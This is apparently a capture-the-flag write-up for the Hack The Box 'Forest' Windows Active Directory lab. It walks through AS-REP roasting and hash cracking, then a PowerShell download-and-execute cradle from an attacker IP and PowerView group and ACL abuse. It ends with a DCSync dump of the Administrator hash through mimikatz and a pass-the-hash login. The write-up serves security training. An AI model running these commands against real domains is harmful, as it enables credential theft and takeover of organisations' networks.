Menu

Forest

Adopt the pace of nature!

Forest is an easy difficulty machine running Windows. It tests your knowledge in Basic enumeration and privelege escalation using common commands as well as using tools such as Bloodhound.

Be sure to checkout the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan forest.htb Grabbing ports... Ports grabbed! Scanning... Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-07 14:53 GMT Nmap scan report for forest.htb ( 10.10.10.161 ) Host is up ( 0.37s latency ) . PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos ( server time : 2019-11-07 07:00:32Z ) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP ( Domain: htb.local, Site: Default-First-Site-Name ) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds ( workgroup: HTB ) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP ( Domain: htb.local, Site: Default-First-Site-Name ) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 ( SSDP/UPnP ) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 ( SSDP/UPnP ) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49684/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC 49714/tcp open msrpc Microsoft Windows RPC Service Info: Host: FOREST ; OS: Windows ; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -5h13m08s , deviation: 4h37m12s, median: -7h53m11s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 ( Windows Server 2016 Standard 6.3 ) | Computer name: FOREST | NetBIOS computer name: FOREST \x 00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time : 2019-11-06T23:03:07-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date : 2019-11-07T07:03:05 |_ start_date: 2019-11-07T06:39:53 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address ( 1 host up ) scanned in 300.76 seconds

From our scan we can see a few things that may be of interest. We have SMB, Kerberos and WinRM which can all be useful in us gaining access.

Enum4Linux

Let’s see if we can grab any useful info:

enum4linux forest.htb > enum4linux.txt

We can then check to see if we have found any users:

cat enum4linux.txt | grep -i users .... SNIP .... .... SNIP .... .... SNIP .... .... SNIP .... enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \A dministrator enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \D efaultAccount enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \k rbtgt .... SNIP .... .... SNIP .... .... SNIP .... .... SNIP .... enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \s ebastien enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \l ucinda enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \s vc-alfresco enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \a ndy enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \m ark enum4linux.txt:Group 'Domain Users' ( RID: 513 ) has member: HTB \s anti

Looks like we have found a few… Nice! Let’s make a list of just the usernames and all the other junk taken out.

User

Since we have usernames but we don’t have any passwords let’s see if any of the users are set without Kerberos pre-authentication required. This is called ASREPRoasting and we will use one of impackets examples for this:

GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

Checking our output file we see that we have grabbed a hash:

cat hashes.asreproast $krb5asrep$23$svc -alfresco @HTB.LOCAL:d36a3e9c1a66....fedc13432f1 $981ae7bbc66fa7e5b60ef5cbd49a1c66709cf03165607db827c1af40deae1f2d8470aac43a226907 2020340bdbd2e1e8752ee190cc3ef007aa8db1a0e4ad5871bf80f874b6add353ed0c87950c9e5ed2b3b9d9bb4a41862cc417f24ef109cd97d1fd79c2c4cea7751bd674d60bc772d31 9ffac306c07c788bac33bba6021acd61ed849e0dcee....a58d61b36ffdf5c1127bb1c115b53c48071328d9bcd5cc9bf0dd021e56ff3fa2aa4e98a113b465982a127d60fa4960c0d3 8d7b6e45975f95fbd45ccf....84f1ea0bf47473f8e3aac56518fc263c7407d67fb6bea4074b98c

Let’s try and crack the hash:

hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt hashcat ( v5.1.0 ) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-6800K CPU @ 3.40GHz, 2048/5918 MB allocatable, 4MCU Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 6 secs $krb5asrep$23$svc -alfresco @HTB.LOCAL:c32a238add6ade578c169b14a26203f5 $49f40b19377f04ea05fc9474c79e3e0242685fb533b0e2c7ad6e41b688221def0bcbf0caa7e 588c01e01132495dd8bc9ec3f5c3afba95bc891f64e18fcb666831f23a0bf2aff1860e36f1c06588ac89182b37980938d9b97a3876b7096434de2f08bc7b8885e974d5f6529dc9e0f fd174a6b23460d0e5c76ba2c2613506c1be1fbbf678464980af717d9fe576fe77310ff97442eb205e18a380b539199658b40246634714bad41808ff2e6542ac86a5e64b94073c1f4b 40d83d6fe6d84dab9ecfed80a14301c935276f16db4d35f83f264a460450ab1d248e34bbc7d7904883ce4fd505d1ec0:s3....ce Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 AS-REP etype 23 Hash.Target......: $krb5asrep$23$svc -alfresco @HTB.LOCAL:c32a238add6ade...5d1ec0 Time.Started.....: Sun Nov 10 13:54:23 2019 ( 8 secs ) Time.Estimated...: Sun Nov 10 13:54:31 2019 ( 0 secs ) Guess.Base.......: File ( /usr/share/wordlists/rockyou.txt ) Guess.Queue......: 1/1 ( 100.00% ) Speed.#1.........: 543.7 kH/s ( 6.04ms ) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 ( 100.00% ) Digests, 1/1 ( 100.00% ) Salts Progress.........: 4087808/14344385 ( 28.50% ) Rejected.........: 0/4087808 ( 0.00% ) Restore.Point....: 4079616/14344385 ( 28.44% ) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: s9039554h -> s2704081

We have valid credentials! Let’s go see if we can login via WinRM:

PS htb\svc-alfresco @ FOREST Documents > cat .. /Desktop/user.txt e5e4e47ae7....013fb0d9ed

We have the user.txt flag. Let’s move on to root !

Root

Taking a look at the groups our user has we see that we have a couple of interest:

PS htb\svc-alfresco @ FOREST Documents > whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ============================ ====== ============================================= ================================================== .... SNIP .... .... SNIP .... .... SNIP .... .... SNIP .... HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group , Enabled by default , Enabled group HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group , Enabled by default , Enabled group

To find a path to own the Domain Administrator we will use Bloodhound.

We grab the data we need by using Sharphound:

PS htb\svc-alfresco @ FOREST Documents > powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker-ip>/SharpHound.ps1');Invoke-BloodHound -CollectionMethod All -SearForest -Domain HTB.LOCAL -DomainController FOREST.HTB.LOCAL -LDAPUser svc-alfresco -LDAPPass s3....ce -ZipFileName bloodhound.zip -Verbose" Initializing BloodHound at 7:49 AM on 3/21/2020 Manually specifying a domain controller will likely result in data loss. Only use this for performance/opsec reasons Adding Network Credential to connection Resolved Collection Methods to Group , LocalAdmin , Session , LoggedOn , Trusts , ACL , Container , RDP , ObjectProps , DCOM , SPNTargets Building GUID Cache Starting Enumeration for HTB.LOCAL Adding Network Credential to connection Waiting for enumeration threads to finish Found usable Domain Controller for htb.local : FOREST.htb.local EXCH01.HTB.LOCAL did not respond to ping Status: 123 objects enumerated ( + 123 61.5 /s --- Using 148 MB RAM ) Finished enumeration for HTB.LOCAL in 00:00:02.6399943 1 hosts failed ping. 0 hosts timedout. Waiting for writer thread to finish Compressing data to C:\Users\svc-alfresco\Documents\bloodhound.zip. You can upload this file directly to the UI. Finished compressing files !

We can then download bloodhound.zip and load it into Bloodhound by going over to the right side and selecting Upload Data from the vertical menu.

On the left side we see Database Info and to the right of that we click on Queries , then select Find Shortest Paths to Domain Admins .

This gives us a nice overview of the path we need to take:

As we expected we move through the groups we saw earlier until we see that we are also in the Account Operators group with GenericAll permissions. We also see the Exchange Windows Permissions group which would give WriteDacl privileges.

If we hover over GenericAll we can right click and select Help :

From here we get literal instructions to add ourselves to the Domain Admins group with PowerView which seems a little too hopeful. Downloading PowerView to the victim machine and trying this results in Permission Denied .

Using the Exchange Windows Permissions group instead we get some success:

PS htb\svc-alfresco @ FOREST Documents > Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Verbose Verbose: [ Add -DomainGroupMember ] Adding member 'svc-alfresco' to group 'Exchange Windows Permissions'

We see that we have been added to the group when we check with net user svc-alfresco . However, after some time it disappears. Meaning the account is reset to avoid spoilers.

So we will try and create another account and add that user to the Exchange Windows Permissions group:

PS htb\svc-alfresco @ FOREST Documents > $SecPassword = ConvertTo-SecureString 's3....ce' -AsPlainText -Force PS htb\svc-alfresco @ FOREST Documents > $Cred = New-Object System.Management.Automation.PSCredential ( 'HTB\svc-alfresco' , $SecPassword ) PS htb\svc-alfresco @ FOREST Documents > $UserPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force PS htb\svc-alfresco @ FOREST Documents > New-DomainUser -SamAccountName sabe -AccountPassword $UserPassword -Credential $Cred -Verbose | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred -Verbose Verbose: [ Get -PrincipalContext ] Using alternate credentials Verbose: [ Get -PrincipalContext ] Using alternate credentials Verbose: [ New -DomainUser ] Attempting to create user 'sabe' Verbose: [ New -DomainUser ] User 'sabe' successfully created Verbose: [ Add -DomainGroupMember ] Adding member 'CN=sabe,CN=Users,DC=htb,DC=local' to group 'Exchange Windows Permissions'

Oh and we almost forgot! Add your new user to the Remote Management Users group:

PS htb\svc-alfresco @ FOREST Documents > Add-DomainGroupMember -Identity 'Remote Management Users' -Members 'sabe' -Verbose Verbose: [ Add -DomainGroupMember ] Adding member 'sabe' to group 'Remote Management Users'

Now let’s login with our new user.

Going back to Bloodhound if we hover over WriteDacl we can right click and select Help once again:

Again we get instructions on how to give ourselves DCSync writes which will hopefully allow us to extract hashes of the Domain Administrator .

Let’s try doing this with the user we just created:

PS htb\seth @ FOREST Documents > $SecPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force PS htb\seth @ FOREST Documents > $Cred = New-Object System.Management.Automation.PSCredential ( 'HTB\sabe' , $SecPassword ) PS htb\seth @ FOREST Documents > Add-DomainObjectAcl -Credential $Cred -TargetIdentity "dc=htb,dc=local" -PrincipalIdentity sabe -Rights DCSync -Verbose

Now we can use mimikatz to extract the Administrator hash:

PS htb\sabe @ FOREST Documents . \mimikatz.exe . #####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47 . ## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux @ gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com *** / mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator [ DC ] 'htb.local' will be the domain [ DC ] 'FOREST.htb.local' will be the DC server [ DC ] 'Administrator' will be the user account Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator User Principal Name : Administrator @ htb.local Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000200 ( NORMAL_ACCOUNT ) Account expiration : Password last change : 9/18/2019 10:09:08 AM Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500 Object Relative ID : 500 Credentials: Hash NTLM: 32693b11e6....72a07ceea6

We can now login using the NTLM Hash:

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6....72a07ceea6 Evil-WinRM shell v2.0 * Evil-WinRM * PS C: \U sers \A dministrator \D ocuments> cat ../Desktop/root.txt f048153f20....04d79129cc

Now that was an interesting one!

Conclusion

This box was really fun to do and fun to help people with as well. The concept was real world in the sense of misconfigurations that can help an attacker gain unauthorized access to a machine.